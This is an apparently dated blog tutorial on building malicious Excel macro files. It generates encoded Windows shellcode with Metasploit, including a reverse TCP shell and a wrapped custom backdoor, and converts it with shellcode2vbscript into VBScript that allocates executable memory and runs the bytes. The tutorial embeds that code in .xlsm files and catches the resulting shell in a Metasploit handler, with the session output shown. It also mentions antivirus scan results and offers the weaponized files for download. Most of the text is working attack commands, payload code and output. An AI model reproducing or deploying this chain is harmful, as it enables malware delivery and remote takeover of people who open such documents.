Create Malicious Excel files using Metasploit and Shellcode2vbscript

First, let’s create our shellcode using metasploit’s msfpayload:

For windows/exec payload:

Code:

root@coresec:~# msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai \
                -c 5 -x /pentest/windows-binaries/pstools/psexec.exe -t raw > CALC.R
 
[*] x86/shikata_ga_nai succeeded with size 227 (iteration=1)
 
[*] x86/shikata_ga_nai succeeded with size 254 (iteration=2)
 
[*] x86/shikata_ga_nai succeeded with size 281 (iteration=3)
 
[*] x86/shikata_ga_nai succeeded with size 308 (iteration=4)
 
[*] x86/shikata_ga_nai succeeded with size 335 (iteration=5)

For reverse_tcp payload:

Code:

root@coresec:~# msfpayload windows/shell/reverse_tcp LHOST=192.168.200.20 LPORT=4444 R | msfencode \
  -e x86/shikata_ga_nai -c 5 -x /pentest/windows-binaries/pstools/psexec.exe -t raw > RVR.R
 
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
 
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
 
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
 
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
 
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)

For your own executable file:

Code:

root@coresec:~# msfencode -i backdoor.exe -e  x86/shikata_ga_nai -c 10 \
  -x /pentest/windows-binaries/pstools/psexec.exe -t raw > BD.R
 
[*] x86/shikata_ga_nai succeeded with size 66589 (iteration=1)
 
[*] x86/shikata_ga_nai succeeded with size 66618 (iteration=2)
 
[*] x86/shikata_ga_nai succeeded with size 66647 (iteration=3)
 
[*] x86/shikata_ga_nai succeeded with size 66676 (iteration=4)
 
[*] x86/shikata_ga_nai succeeded with size 66705 (iteration=5)

Next step is to convert shellcodes to VBScript using the shellcode2vbscript_v0_1 python tool from Didier Stevens:

Code:

root@coresec:~# wget http://www.didierstevens.com/files/software/shellcode2vbscript_v0_1.zip
--2011-04-23 14:30:31--  http://www.didierstevens.com/files/software/shellcode2vbscript_v0_1.zip
Resolving www.didierstevens.com... 173.201.107.126
Connecting to www.didierstevens.com|173.201.107.126|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1378 (1.3K) [application/x-zip-compressed]
Saving to: `shellcode2vbscript_v0_1.zip'
 
100%[===========================================================>] 1,378       --.-K/s   in 0s      
 
2011-04-23 14:30:52 (86.4 MB/s) - `shellcode2vbscript_v0_1.zip' saved [1378/1378]
 
root@coresec:~# mkdir shellcode2vbscript
root@coresec:~# unzip shellcode2vbscript_v0_1.zip -d shellcode2vbscript
Archive:  shellcode2vbscript_v0_1.zip
  inflating: shellcode2vbscript/shellcode2vbscript.py
root@coresec:~# python shellcode2vbscript_v0_1/shellcode2vbscript.py CALC.R CALC.vbs
root@coresec:~# python shellcode2vbscript_v0_1/shellcode2vbscript.py RVR.R RVR.vbs
root@coresec:~# ls -al CALC.vbs RVR.vbs
-rw-r--r-- 1 root root 3418 Apr 23 14:29 CALC.vbs
-rw-r--r-- 1 root root 3888 Apr 23 14:30 RVR.vbs

Now, our VBScripts are ready, lets see the code of CALC.vbs:

Code:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63

Private Declare Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long Private Declare Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal lpBuffer As String, ByVal dwSize As Long, ByRef lpNumberOfBytesWritten As Long) As Integer Private Declare Function CreateThread Lib "KERNEL32" (ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, ByVal lpParameter As Long, ByVal dwCreationFlags As Long, ByRef lpThreadId As Long) As Long   Const MEM_COMMIT = &H1000 Const PAGE_EXECUTE_READWRITE = &H40   Private Sub ExecuteShellCode() Dim lpMemory As Long Dim sShellCode As String Dim lResult As Long   sShellCode = ShellCode() lpMemory = VirtualAlloc(0&, Len(sShellCode), MEM_COMMIT, PAGE_EXECUTE_READWRITE) lResult = WriteProcessMemory(-1&, lpMemory, sShellCode, Len(sShellCode), 0&) lResult = CreateThread(0&, 0&, lpMemory, 0&, 0&, 0&) End Sub   Private Function ParseBytes(strBytes) As String Dim aNumbers Dim sShellCode As String Dim iIter   sShellCode = "" aNumbers = split(strBytes) for iIter = lbound(aNumbers) to ubound(aNumbers) sShellCode = sShellCode + Chr(aNumbers(iIter)) next   ParseBytes = sShellCode End Function   Private Function ShellCode1() As String Dim sShellCode As String   sShellCode = "" sShellCode = sShellCode + ParseBytes("218 203 184 213 89 140 182 217 116 36 244 95 51 201 177 78 131 239 252 49 71 19 3") sShellCode = sShellCode + ParseBytes("146 74 110 67 199 185 183 216 211 181 243 2 32 140 238 29 101 57 95 218 184 225 184") sShellCode = sShellCode + ParseBytes("102 82 237 186 48 149 215 242 145 177 70 202 221 13 155 44 133 217 202 138 232 188") sShellCode = sShellCode + ParseBytes("196 51 198 163 90 239 67 214 55 124 8 120 173 104 221 142 124 57 128 1 165 213 25") sShellCode = sShellCode + ParseBytes("211 78 145 37 3 200 28 171 244 145 218 247 129 189 181 255 86 252 194 249 233 79 245") sShellCode = sShellCode + ParseBytes("2 25 97 248 38 184 12 119 242 187 205 87 102 116 144 151 201 158 251 33 25 5 144 53") sShellCode = sShellCode + ParseBytes("100 184 8 207 129 122 171 10 62 99 17 116 34 148 79 156 42 73 228 18 96 6 167 143") sShellCode = sShellCode + ParseBytes("228 34 41 111 247 123 85 247 68 166 80 189 205 190 158 93 137 28 108 212 133 52 185") sShellCode = sShellCode + ParseBytes("215 180 95 192 145 200 108 24 117 173 140 206 118 82 154 64 167 202 183 53 137 2 91") sShellCode = sShellCode + ParseBytes("80 100 244 232 208 219 177 71 199 253 147 155 121 72 25 62 202 76 46 221 95 172 86") sShellCode = sShellCode + ParseBytes("237 36 238 199 178 145 95 176 119 135 37 122 45 141 64 166 103 5 48 237 174 171 192") sShellCode = sShellCode + ParseBytes("243 41 24 82 137 232 168 50 187 1 241 73 171 228 212 185 165 227 15 22 27 4 14 205") sShellCode = sShellCode + ParseBytes("66 211 92 161 216 171 236 199 7 240 255 87 192 38 121 162 8 216 18 111 250 92 45 32") sShellCode = sShellCode + ParseBytes("247 238 33 196 105 210 232 13 127 104 232 201 95 57 96 189 67 97 242 253 193 198 186") sShellCode = sShellCode + ParseBytes("109 199 61 47 71 59 141 138 186 249")   ShellCode1 = sShellCode End Function   Private Function ShellCode() As String Dim sShellCode As String   sShellCode = "" sShellCode = sShellCode + ShellCode1()   ShellCode = sShellCode End Function

Then, we are able to insert the malicious VBScript to our Excel files (CALC.vbs -> CALC.xlsm & RVR.vbs -> RVR.xlsm):

Finally let’s execute our Macros:

Code:

root@coresec:~# msfconsole 
 
                |                    |      _) |
 __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __|
 |   |   |  __/ |   (   |\__ \ |   | | (   | | |
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
                              _|
 
       =[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 680 exploits - 354 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
       =[ svn r12397 updated yesterday (2011.04.21)
 
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(handler) > set lhost 192.168.200.20
lhost => 192.168.200.20
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit
 
[*] Started reverse handler on 192.168.200.20:4444
[*] Starting the payload handler...
[*] Sending stage (240 bytes) to 192.168.200.2
[*] Command shell session 1 opened (192.168.200.20:4444 -> 192.168.200.25:45668) at Sat Apr 23 14:54:32 +0300 2011
 
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
C:\Users\coresec\Documents>

NoVirusThanks results:

Download:

• shellcode2vbscript_v0_1
• RVR.xlsm
• CALC.xlsm

Suggestions and comments are welcome